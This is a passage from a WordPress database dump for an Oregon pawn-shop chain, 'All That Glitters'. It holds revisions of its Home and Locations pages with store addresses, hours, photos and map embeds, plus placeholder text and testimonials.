align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Tigard_Inside_-2.jpg\"><img class=\"wp-image-92 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Tigard_Inside_-2-300x177.jpg\" alt=\"Tigard_Inside_-2\" width=\"300\" height=\"177\" /></a> 12760 SW Pacific Hwy[/caption]\r\n\r\n[/span4]\r\n[span4]\r\n<iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d2800.122881897304!2d-122.7771537!3d45.427024200000005!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x54950d2478b9878b%3A0x8606ae6c36002c06!2s12760+SW+Pacific+Hwy%2C+Tigard%2C+OR+97223!5e0!3m2!1sen!2sus!4v1424972494023\" width=\"400\" height=\"300\" frameborder=\"0\"></iframe>\r\n[/span4]\r\n<strong>SALEM, OR: 1191 Lancaster Dr. NE 503-362-9939</strong>\r\n[span4]\r\n\r\n[caption id=\"attachment_91\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Salem_Outside-2.jpg\"><img class=\"wp-image-91 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Salem_Outside-2-300x131.jpg\" alt=\"Salem_Outside-2\" width=\"300\" height=\"131\" /></a> 1191 Lancaster Dr. NE[/caption]\r\n\r\n[/span4]\r\n[span4]\r\n\r\n[caption id=\"attachment_90\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Salem_inside-2.jpg\"><img class=\"wp-image-90 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Salem_inside-2-300x155.jpg\" alt=\"Salem_inside-2\" width=\"300\" height=\"155\" /></a> 1191 Lancaster Dr. NE[/caption]\r\n\r\n[/span4]\r\n[span4]\r\n<iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d2823.9331948345302!2d-122.98391!3d44.945026!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x54bffec2370440b3%3A0x851994b509c59f4b!2s1191+Lancaster+Dr+NE%2C+Salem%2C+OR+97301!5e0!3m2!1sen!2sus!4v1424972552736\" width=\"400\" height=\"300\" frameborder=\"0\"></iframe>\r\n[/span4]','Locations','','inherit','open','open','','83-revision-v1','','','2015-03-09 13:48:33','2015-03-09 20:48:33','',83,'http://atgjewelry.com/fuze7/83-revision-v1/',0,'revision','',0),(156,1,'2015-03-09 13:05:34','2015-03-09 20:05:34','<h1 style=\"text-align: center;\"><strong>5 Oregon Locations, Open 7 Days a Week!</strong></h1>\r\n<h4 style=\"text-align: center;\"><strong>Monday - Saturday: 10:00 AM - 7:00 PM</strong></h4>\r\n<h4 style=\"text-align: center;\"><strong>Sunday: 11:00 AM - 5:00 PM</strong></h4>\r\n<strong>PORTLAND, OR: 2932 N. Lombard 503-247-1019</strong>\r\n[span4]\r\n<a class=\"thickbox\" href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Lombard-outside.jpg\"><img class=\"alignnone wp-image-154 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Lombard-outside-300x215.jpg\" alt=\"Lombard, All that Glitters\" width=\"300\" height=\"215\" /></a>\r\n\r\n[/span4]\r\n[span4]\r\n\r\n<a class=\"thickbox\" href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Lombard-inside.jpg\"><img class=\"alignnone wp-image-155 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Lombard-inside-300x215.jpg\" alt=\"Lombard, all that glitters\" width=\"300\" height=\"215\" /></a>\r\n[/span4]\r\n[span4]\r\n<iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d2792.6752415075734!2d-122.6973386!3d45.576969!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x5495a7bc5175458b%3A0x6a338a6c83521185!2s2932+N+Lombard+St%2C+Portland%2C+OR+97217!5e0!3m2!1sen!2sus!4v1424971890870\" width=\"400\" height=\"300\" frameborder=\"0\"></iframe>\r\n[/span4]\r\n<strong>PORTLAND, OR: 12200 SE Division 503-761-9699</strong>\r\n[span4]\r\n\r\n[caption id=\"attachment_85\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Division_outside-2.jpg\"><img class=\"wp-image-85 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Division_outside-2-300x221.jpg\" alt=\"Division_outside-2\" width=\"300\" height=\"221\" /></a> 12200 SE Division[/caption]\r\n\r\n[/span4]\r\n[span4]\r\n<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Division_inside-2.jpg\"><img class=\"alignnone wp-image-84 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Division_inside-2-300x192.jpg\" alt=\"\" width=\"300\" height=\"192\" /></a>\r\n[/span4]\r\n[span4]\r\n<iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d2796.308567804789!2d-122.53730759999999!3d45.503866699999996!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x5495a1c202f16d99%3A0xd11d950ef929fd57!2s12200+SE+Division+St%2C+Portland%2C+OR+97236!5e0!3m2!1sen!2sus!4v1424972011050\" width=\"400\" height=\"300\" frameborder=\"0\"></iframe>\r\n[/span4]\r\n<strong>MILWAUKIE, OR: 15114 SE McLoughlin 503-785-1168</strong>\r\n[span4]\r\n<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_outside.jpg\"><img class=\"alignnone wp-image-89 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_outside-300x241.jpg\" alt=\"\" width=\"300\" height=\"241\" /></a>\r\n[/span4]\r\n[span4]\r\n\r\n[caption id=\"attachment_88\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_inside.jpg\"><img class=\"wp-image-88 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_inside-300x200.jpg\" alt=\"Milwaukie_inside\" width=\"300\" height=\"200\" /></a> 15114 SE McLoughlin[/caption]\r\n\r\n[/span4]\r\n[span4]\r\n<iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d2800.7774589673077!2d-122.62954599999999!3d45.413827!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x5495745ed4b97ea3%3A0x718f1732179ebc6e!2s15114+SE+McLoughlin+Blvd%2C+Portland%2C+OR+97267!5e0!3m2!1sen!2sus!4v1424972438719\" width=\"400\" height=\"300\" frameborder=\"0\"></iframe>\r\n[/span4]\r\n<strong>TIGARD, OR: 12760 SW Pacific Hwy 503-761-9699</strong>\r\n[span4]\r\n\r\n[caption id=\"attachment_93\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Tigard_Site_Outside-2.jpg\"><img class=\"wp-image-93 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Tigard_Site_Outside-2-300x199.jpg\" alt=\"Tigard_Site_Outside-2\" width=\"300\" height=\"199\" /></a> 12760 SW Pacific Hwy[/caption]\r\n\r\n[/span4]\r\n[span4]\r\n\r\n[caption id=\"attachment_92\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Tigard_Inside_-2.jpg\"><img class=\"wp-image-92 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Tigard_Inside_-2-300x177.jpg\" alt=\"Tigard_Inside_-2\" width=\"300\" height=\"177\" /></a> 12760 SW Pacific Hwy[/caption]\r\n\r\n[/span4]\r\n[span4]\r\n<iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d2800.122881897304!2d-122.7771537!3d45.427024200000005!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x54950d2478b9878b%3A0x8606ae6c36002c06!2s12760+SW+Pacific+Hwy%2C+Tigard%2C+OR+97223!5e0!3m2!1sen!2sus!4v1424972494023\" width=\"400\" height=\"300\" frameborder=\"0\"></iframe>\r\n[/span4]\r\n<strong>SALEM, OR: 1191 Lancaster Dr. NE 503-362-9939</strong>\r\n[span4]\r\n\r\n[caption id=\"attachment_91\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Salem_Outside-2.jpg\"><img class=\"wp-image-91 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Salem_Outside-2-300x131.jpg\" alt=\"Salem_Outside-2\" width=\"300\" height=\"131\" /></a> 1191 Lancaster Dr. NE[/caption]\r\n\r\n[/span4]\r\n[span4]\r\n\r\n[caption id=\"attachment_90\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Salem_inside-2.jpg\"><img class=\"wp-image-90 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Salem_inside-2-300x155.jpg\" alt=\"Salem_inside-2\" width=\"300\" height=\"155\" /></a> 1191 Lancaster Dr. NE[/caption]\r\n\r\n[/span4]\r\n[span4]\r\n<iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d2823.9331948345302!2d-122.98391!3d44.945026!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x54bffec2370440b3%3A0x851994b509c59f4b!2s1191+Lancaster+Dr+NE%2C+Salem%2C+OR+97301!5e0!3m2!1sen!2sus!4v1424972552736\" width=\"400\" height=\"300\" frameborder=\"0\"></iframe>\r\n[/span4]','Locations','','inherit','open','open','','83-revision-v1','','','2015-03-09 13:05:34','2015-03-09 20:05:34','',83,'http://atgjewelry.com/fuze7/83-revision-v1/',0,'revision','',0),(139,1,'2015-02-26 09:42:46','2015-02-26 17:42:46','<h1 style=\"text-align: center;\"><strong>5 Oregon Locations, Open 7 Days a Week!</strong></h1>\r\n<h4 style=\"text-align: center;\"><strong>Monday - Saturday: 10:00 AM - 7:00 PM</strong></h4>\r\n<h4 style=\"text-align: center;\"><strong>Sunday: 11:00 AM - 5:00 PM</strong></h4>\r\n<strong>PORTLAND, OR: 2932 N. Lombard 503-247-1019</strong>\r\n[span4]\r\n[caption id=\"attachment_87\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Lombard_outside-2.jpg\"><img class=\"wp-image-87 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Lombard_outside-2-300x215.jpg\" alt=\"2932 N. Lombard\" width=\"300\" height=\"215\" /></a> 2932 N. Lombard[/caption]\r\n[/span4]\r\n[span4]\r\n[caption id=\"attachment_86\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Lombard_inside-2.jpg\"><img class=\"wp-image-86 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Lombard_inside-2-300x173.jpg\" alt=\"2932 N. Lombard\" width=\"300\" height=\"173\" /></a> 2932 N. Lombard[/caption]\r\n[/span4]\r\n[span4]\r\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d2792.6752415075734!2d-122.6973386!3d45.576969!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x5495a7bc5175458b%3A0x6a338a6c83521185!2s2932+N+Lombard+St%2C+Portland%2C+OR+97217!5e0!3m2!1sen!2sus!4v1424971890870\" width=\"400\" height=\"300\" frameborder=\"0\" style=\"border:0\"></iframe>\r\n[/span4]\r\n<strong>PORTLAND, OR: 12200 SE Division 503-761-9699</strong>\r\n[span4]\r\n[caption id=\"attachment_85\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Division_outside-2.jpg\"><img class=\"wp-image-85 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Division_outside-2-300x221.jpg\" alt=\"Division_outside-2\" width=\"300\" height=\"221\" /></a> 12200 SE Division[/caption]\r\n[/span4]\r\n[span4]\r\n<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Division_inside-2.jpg\"><img class=\"alignnone wp-image-84 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Division_inside-2-300x192.jpg\" alt=\"\" width=\"300\" height=\"192\" /></a>\r\n[/span4]\r\n[span4]\r\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d2796.308567804789!2d-122.53730759999999!3d45.503866699999996!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x5495a1c202f16d99%3A0xd11d950ef929fd57!2s12200+SE+Division+St%2C+Portland%2C+OR+97236!5e0!3m2!1sen!2sus!4v1424972011050\" width=\"400\" height=\"300\" frameborder=\"0\" style=\"border:0\"></iframe>\r\n[/span4]\r\n<strong>MILWAUKIE, OR: 15114 SE McLoughlin 503-785-1168</strong>\r\n[span4]\r\n<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_outside.jpg\"><img class=\"alignnone wp-image-89 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_outside-300x241.jpg\" alt=\"\" width=\"300\" height=\"241\" /></a>\r\n[/span4]\r\n[span4]\r\n[caption id=\"attachment_88\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_inside.jpg\"><img class=\"wp-image-88 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_inside-300x200.jpg\" alt=\"Milwaukie_inside\" width=\"300\" height=\"200\" /></a> 15114 SE McLoughlin[/caption]\r\n[/span4]\r\n[span4]\r\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d2800.7774589673077!2d-122.62954599999999!3d45.413827!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x5495745ed4b97ea3%3A0x718f1732179ebc6e!2s15114+SE+McLoughlin+Blvd%2C+Portland%2C+OR+97267!5e0!3m2!1sen!2sus!4v1424972438719\" width=\"400\" height=\"300\" frameborder=\"0\" style=\"border:0\"></iframe>\r\n[/span4]\r\n<strong>TIGARD, OR: 12760 SW Pacific Hwy 503-761-9699</strong>\r\n[span4]\r\n[caption id=\"attachment_93\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Tigard_Site_Outside-2.jpg\"><img class=\"wp-image-93 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Tigard_Site_Outside-2-300x199.jpg\" alt=\"Tigard_Site_Outside-2\" width=\"300\" height=\"199\" /></a> 12760 SW Pacific Hwy[/caption]\r\n[/span4]\r\n[span4]\r\n[caption id=\"attachment_92\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Tigard_Inside_-2.jpg\"><img class=\"wp-image-92 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Tigard_Inside_-2-300x177.jpg\" alt=\"Tigard_Inside_-2\" width=\"300\" height=\"177\" /></a> 12760 SW Pacific Hwy[/caption]\r\n[/span4]\r\n[span4]\r\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d2800.122881897304!2d-122.7771537!3d45.427024200000005!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x54950d2478b9878b%3A0x8606ae6c36002c06!2s12760+SW+Pacific+Hwy%2C+Tigard%2C+OR+97223!5e0!3m2!1sen!2sus!4v1424972494023\" width=\"400\" height=\"300\" frameborder=\"0\" style=\"border:0\"></iframe>\r\n[/span4]\r\n<strong>SALEM, OR: 1191 Lancaster Dr. NE 503-362-9939</strong>\r\n[span4]\r\n[caption id=\"attachment_91\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Salem_Outside-2.jpg\"><img class=\"wp-image-91 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Salem_Outside-2-300x131.jpg\" alt=\"Salem_Outside-2\" width=\"300\" height=\"131\" /></a> 1191 Lancaster Dr. NE[/caption]\r\n[/span4]\r\n[span4]\r\n[caption id=\"attachment_90\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Salem_inside-2.jpg\"><img class=\"wp-image-90 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Salem_inside-2-300x155.jpg\" alt=\"Salem_inside-2\" width=\"300\" height=\"155\" /></a> 1191 Lancaster Dr. NE[/caption]\r\n[/span4]\r\n[span4]\r\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d2823.9331948345302!2d-122.98391!3d44.945026!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x54bffec2370440b3%3A0x851994b509c59f4b!2s1191+Lancaster+Dr+NE%2C+Salem%2C+OR+97301!5e0!3m2!1sen!2sus!4v1424972552736\" width=\"400\" height=\"300\" frameborder=\"0\" style=\"border:0\"></iframe>\r\n[/span4]','Locations','','inherit','open','open','','83-revision-v1','','','2015-02-26 09:42:46','2015-02-26 17:42:46','',83,'http://atgjewelry.com/fuze7/83-revision-v1/',0,'revision','',0),(140,1,'2015-02-26 09:57:21','2015-02-26 17:57:21','<h1 style=\"text-align: center;\">All That Glitters, Reinventing The Pawn Shop</h1>\r\n<p style=\"text-align: center;\">[row_fluid]\r\n[one_third]All of our pawn shops are designed with you, the customer, in mind. We strive to offer you an experience that will remind you more of an upscale retail store than a traditional pawn shop...and with our prices on merchandise and large selection, there\'s no reason to pay upscale retail prices again.[/one_third]</p>\r\n<p style=\"text-align: center;\">[one_third]At All That Glitters, we believe that quality customer service is a direct result of qualified pawnbrokers working together for the common goal of presenting the public with high quality pre-owned products professionally displayed at prices well below retail.[/one_third]</p>\r\n<p style=\"text-align: center;\">[one_third]\r\nAs our inventory is always changing, be sure and check back often to find that item you need at the price you can afford. At All That Glitters, there are no gimmicks, just good business.\r\n[/one_third]\r\n[/row_fluid]</p>\r\n\r\n<h2><strong>Oregon Locations</strong></h2>\r\n<h4>[row]\r\n[span1][/span1]\r\n<strong>[span2]N. Portland</strong>\r\n2932 N. Lombard\r\n503-247-1019[/span2]\r\n<strong>[span2]S.E. Portland</strong>\r\n12200 SE Division\r\n503-761-9699[/span2]\r\n<strong>[span2]Milwaukie</strong>\r\n15114 SE McLoughlin\r\n503-785-1168[/span2]\r\n<strong>[span2]Tigard</strong>\r\n12760 SW Pacific Hwy\r\n503-968-9510[/span2]\r\n<strong>[span2]Salem</strong>\r\n1191 Lancaster Dr NE\r\n503-362-9939[/span2]\r\n[span1][/span1]\r\n[/row]</h4>\r\n[row_fluid]\r\n[one_third]\r\n<strong>Jewelry</strong>\r\nLorem ipsum\r\n\r\n[/one_third]\r\n[one_third]\r\n<strong>Loans</strong>\r\nLorem ipsum\r\n[/one_third]\r\n[one_third]\r\n<strong>Gold</strong>\r\nLorem Ipsum\r\n[/one_third]\r\n[/row_fluid]','Home','','inherit','open','open','','48-revision-v1','','','2015-02-26 09:57:21','2015-02-26 17:57:21','',48,'http://atgjewelry.com/fuze7/48-revision-v1/',0,'revision','',0),(141,1,'2015-02-26 12:08:59','2015-02-26 20:08:59','<h1 style=\"text-align: center;\">All That Glitters, Reinventing The Pawn Shop</h1>\r\n<p style=\"text-align: center;\">[row_fluid]\r\n[one_third]All of our pawn shops are designed with you, the customer, in mind. We strive to offer you an experience that will remind you more of an upscale retail store than a traditional pawn shop...and with our prices on merchandise and large selection, there\'s no reason to pay upscale retail prices again.[/one_third]</p>\r\n<p style=\"text-align: center;\">[one_third]At All That Glitters, we believe that quality customer service is a direct result of qualified pawnbrokers working together for the common goal of presenting the public with high quality pre-owned products professionally displayed at prices well below retail.[/one_third]</p>\r\n<p style=\"text-align: center;\">[one_third]\r\nAs our inventory is always changing, be sure and check back often to find that item you need at the price you can afford. At All That Glitters, there are no gimmicks, just good business.\r\n[/one_third]\r\n[/row_fluid]</p>\r\n\r\n<h2><strong>Oregon Locations</strong></h2>\r\n<h4>[row]\r\n[span1][/span1]\r\n<strong>[span2]N. Portland</strong>\r\n2932 N. Lombard\r\n503-247-1019[/span2]\r\n<strong>[span2]S.E. Portland</strong>\r\n12200 SE Division\r\n503-761-9699[/span2]\r\n<strong>[span2]Milwaukie</strong>\r\n15114 SE McLoughlin\r\n503-785-1168[/span2]\r\n<strong>[span2]Tigard</strong>\r\n12760 SW Pacific Hwy\r\n503-968-9510[/span2]\r\n<strong>[span2]Salem</strong>\r\n1191 Lancaster Dr NE\r\n503-362-9939[/span2]\r\n[span1][/span1]\r\n[/row]</h4>\r\n[row_fluid]\r\n[one_third]\r\n<h3>Jewelry</h3>\r\nLorem ipsum\r\n\r\n[/one_third]\r\n[one_third]\r\n<h3>Loans</h3>\r\nLorem ipsum\r\n[/one_third]\r\n[one_third]\r\n<h3>Gold</h3>\r\nLorem Ipsum\r\n[/one_third]\r\n[/row_fluid]\r\n\r\n<img class=\"alignleft size-medium wp-image-89\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_outside-300x241.jpg\" alt=\"Milwaukie_outside\" width=\"300\" height=\"241\" />Lorem ipsum, morbi leo risus, porta ac conset','Home','','inherit','open','open','','48-revision-v1','','','2015-02-26 12:08:59','2015-02-26 20:08:59','',48,'http://atgjewelry.com/fuze7/48-revision-v1/',0,'revision','',0),(142,1,'2015-02-26 12:11:23','2015-02-26 20:11:23','','jewelry','','inherit','open','open','','jewelry-2','','','2015-02-26 12:11:23','2015-02-26 20:11:23','',48,'http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/jewelry.jpg',0,'attachment','image/jpeg',0),(143,1,'2015-02-26 12:12:01','2015-02-26 20:12:01','','loans','','inherit','open','open','','loans-2','','','2015-02-26 12:12:01','2015-02-26 20:12:01','',48,'http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/loans.jpg',0,'attachment','image/jpeg',0),(144,1,'2015-02-26 12:12:21','2015-02-26 20:12:21','','gold','','inherit','open','open','','gold','','','2015-02-26 12:12:21','2015-02-26 20:12:21','',48,'http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/gold.jpg',0,'attachment','image/jpeg',0),(146,1,'2015-02-26 12:14:42','2015-02-26 20:14:42','<h1 style=\"text-align: center;\">All That Glitters, Reinventing The Pawn Shop</h1>\r\n[row_fluid]\r\n[one_third]All of our pawn shops are designed with you, the customer, in mind. We strive to offer you an experience that will remind you more of an upscale retail store than a traditional pawn shop...and with our prices on merchandise and large selection, there\'s no reason to pay upscale retail prices again.[/one_third]\r\n[one_third]At All That Glitters, we believe that quality customer service is a direct result of qualified pawnbrokers working together for the common goal of presenting the public with high quality pre-owned products professionally displayed at prices well below retail.[/one_third]\r\n[one_third]\r\nAs our inventory is always changing, be sure and check back often to find that item you need at the price you can afford. At All That Glitters, there are no gimmicks, just good business.\r\n[/one_third]\r\n[/row_fluid]\r\n\r\n<h2><strong>Oregon Locations</strong></h2>\r\n<h4>[row]\r\n[span1][/span1]\r\n<strong>[span2]N. Portland</strong>\r\n2932 N. Lombard\r\n503-247-1019[/span2]\r\n<strong>[span2]S.E. Portland</strong>\r\n12200 SE Division\r\n503-761-9699[/span2]\r\n<strong>[span2]Milwaukie</strong>\r\n15114 SE McLoughlin\r\n503-785-1168[/span2]\r\n<strong>[span2]Tigard</strong>\r\n12760 SW Pacific Hwy\r\n503-968-9510[/span2]\r\n<strong>[span2]Salem</strong>\r\n1191 Lancaster Dr NE\r\n503-362-9939[/span2]\r\n[span1][/span1]\r\n[/row]</h4>\r\n[row_fluid]\r\n[one_third]\r\n<img class=\"alignnone size-full wp-image-142\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/jewelry.jpg\" alt=\"jewelry\" width=\"318\" height=\"157\" />\r\n<h3>Jewelry</h3>\r\nLorem ipsum\r\n\r\n[/one_third]\r\n[one_third]\r\n<img class=\"alignnone size-full wp-image-143\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/loans.jpg\" alt=\"loans\" width=\"318\" height=\"157\" />\r\n<h3>Loans</h3>\r\nLorem ipsum\r\n[/one_third]\r\n[one_third]\r\n<img class=\"alignnone size-full wp-image-144\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/gold.jpg\" alt=\"gold\" width=\"318\" height=\"157\" />\r\n<h3>Gold</h3>\r\nLorem Ipsum\r\n[/one_third]\r\n[/row_fluid]\r\n\r\n<img class=\"alignleft size-medium wp-image-89\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_outside-300x241.jpg\" alt=\"Milwaukie_outside\" width=\"300\" height=\"241\" />Lorem ipsum, morbi leo risus, porta ac conset','Home','','inherit','open','open','','48-revision-v1','','','2015-02-26 12:14:42','2015-02-26 20:14:42','',48,'http://atgjewelry.com/fuze7/48-revision-v1/',0,'revision','',0),(145,1,'2015-02-26 12:12:34','2015-02-26 20:12:34','<h1 style=\"text-align: center;\">All That Glitters, Reinventing The Pawn Shop</h1>\r\n<p style=\"text-align: center;\">[row_fluid]\r\n[one_third]All of our pawn shops are designed with you, the customer, in mind. We strive to offer you an experience that will remind you more of an upscale retail store than a traditional pawn shop...and with our prices on merchandise and large selection, there\'s no reason to pay upscale retail prices again.[/one_third]</p>\r\n<p style=\"text-align: center;\">[one_third]At All That Glitters, we believe that quality customer service is a direct result of qualified pawnbrokers working together for the common goal of presenting the public with high quality pre-owned products professionally displayed at prices well below retail.[/one_third]</p>\r\n<p style=\"text-align: center;\">[one_third]\r\nAs our inventory is always changing, be sure and check back often to find that item you need at the price you can afford. At All That Glitters, there are no gimmicks, just good business.\r\n[/one_third]\r\n[/row_fluid]</p>\r\n\r\n<h2><strong>Oregon Locations</strong></h2>\r\n<h4>[row]\r\n[span1][/span1]\r\n<strong>[span2]N. Portland</strong>\r\n2932 N. Lombard\r\n503-247-1019[/span2]\r\n<strong>[span2]S.E. Portland</strong>\r\n12200 SE Division\r\n503-761-9699[/span2]\r\n<strong>[span2]Milwaukie</strong>\r\n15114 SE McLoughlin\r\n503-785-1168[/span2]\r\n<strong>[span2]Tigard</strong>\r\n12760 SW Pacific Hwy\r\n503-968-9510[/span2]\r\n<strong>[span2]Salem</strong>\r\n1191 Lancaster Dr NE\r\n503-362-9939[/span2]\r\n[span1][/span1]\r\n[/row]</h4>\r\n[row_fluid]\r\n[one_third]\r\n<img class=\"alignnone size-full wp-image-142\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/jewelry.jpg\" alt=\"jewelry\" width=\"318\" height=\"157\" />\r\n<h3>Jewelry</h3>\r\nLorem ipsum\r\n\r\n[/one_third]\r\n[one_third]\r\n<img class=\"alignnone size-full wp-image-143\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/loans.jpg\" alt=\"loans\" width=\"318\" height=\"157\" />\r\n<h3>Loans</h3>\r\nLorem ipsum\r\n[/one_third]\r\n[one_third]\r\n<img class=\"alignnone size-full wp-image-144\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/gold.jpg\" alt=\"gold\" width=\"318\" height=\"157\" />\r\n<h3>Gold</h3>\r\nLorem Ipsum\r\n[/one_third]\r\n[/row_fluid]\r\n\r\n<img class=\"alignleft size-medium wp-image-89\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_outside-300x241.jpg\" alt=\"Milwaukie_outside\" width=\"300\" height=\"241\" />Lorem ipsum, morbi leo risus, porta ac conset','Home','','inherit','open','open','','48-revision-v1','','','2015-02-26 12:12:34','2015-02-26 20:12:34','',48,'http://atgjewelry.com/fuze7/48-revision-v1/',0,'revision','',0),(147,1,'2015-02-28 09:39:19','2015-02-28 17:39:19','Wow, what a great store.','Jane','','publish','closed','closed','','jane','','','2015-02-28 09:39:19','2015-02-28 17:39:19','',0,'http://atgjewelry.com/fuze7/?post_type=testi&p=147',0,'testi','',0),(148,1,'2015-02-28 09:42:19','2015-02-28 17:42:19','They had some great looking guitars.','Tarzan','','publish','closed','closed','','tarzan','','','2015-02-28 09:42:19','2015-02-28 17:42:19','',0,'http://atgjewelry.com/fuze7/?post_type=testi&p=148',0,'testi','',0),(149,1,'2015-02-28 09:46:35','2015-02-28 17:46:35','[row_fluid]\r\n[one_half]\r\nYou can bring your gold, silver or platinum into any one of All That Glitters five convenient locations for a free assessment and cash offer. Our buyers will work to offer you the best cash price in town, and you can walk away with cash in hand in a matter of minutes.\r\n[/one_half]\r\n[one_half]\r\nWhy deal with the hassle and risk of mail order gold buyers when you can come into a state licensed legitimate local business and safely sell your unwanted gold? Come in today for a free evaluation of your unwanted jewelry items. Broken, missing stones we buy it all.\r\n[/one_half]\r\n[/row_fluid]','We Buy Gold','','inherit','open','open','','37-revision-v1','','','2015-02-28 09:46:35','2015-02-28 17:46:35','',37,'http://atgjewelry.com/fuze7/37-revision-v1/',0,'revision','',0),(152,1,'2015-03-09 12:45:32','2015-03-09 19:45:32','','ATG_light-bgrd','','inherit','open','open','','atg_light-bgrd','','','2015-03-09 